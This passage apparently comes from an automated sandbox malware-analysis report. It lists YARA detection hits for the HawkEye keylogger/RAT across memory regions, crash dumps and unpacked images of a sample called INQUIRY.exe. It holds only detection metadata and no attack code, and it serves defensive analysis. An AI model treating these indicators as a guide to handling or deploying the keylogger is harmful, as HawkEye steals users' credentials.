                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
